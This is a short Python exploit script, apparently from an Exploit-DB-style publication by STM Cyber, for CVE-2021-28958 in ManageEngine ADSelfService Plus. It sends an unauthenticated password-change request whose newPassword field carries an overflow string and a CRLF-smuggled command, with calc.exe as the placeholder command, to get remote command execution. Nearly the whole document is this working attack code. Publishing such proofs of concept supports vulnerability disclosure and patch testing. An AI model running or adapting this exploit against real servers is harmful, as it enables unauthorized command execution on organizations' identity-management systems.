#
# STM Cyber R&D
# https://blog.stmcyber.com
#
# Exploit Title: ManageEngine ADSelfService Plus - Unauthenticated RCE in password change function
# Exploit Author: Krzysztof Andrusiak, Marcin Ogorzelski
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: < 6102
# Tested on: Windows Server 2019
# CVE: CVE-2021-28958

import requests

URL = 'http://x.x.x.x:8888'
DOMAIN = 'ALPHACORP.LOCAL'
CMD = 'calc.exe'

params = {
    'operation': 'UMCP',
    'loginName': 'krbtgt', # any valid username
    'domainName': DOMAIN,
    'umcp': 'true',
    'IS_ENCRYPTED': 'false',
    'oldPassword': 'whatever',
    'newPassword': 'A' * 256 + '"' + '\r\n' + CMD + '\r\n'
}

try:
    requests.get(URL.rstrip('/') + '/RestAPI/ChangePasswordAPI', params=params, timeout=5, verify=False)
    print("[-] Something went wrong.")
except requests.exceptions.ReadTimeout:
    print("[+] Done.")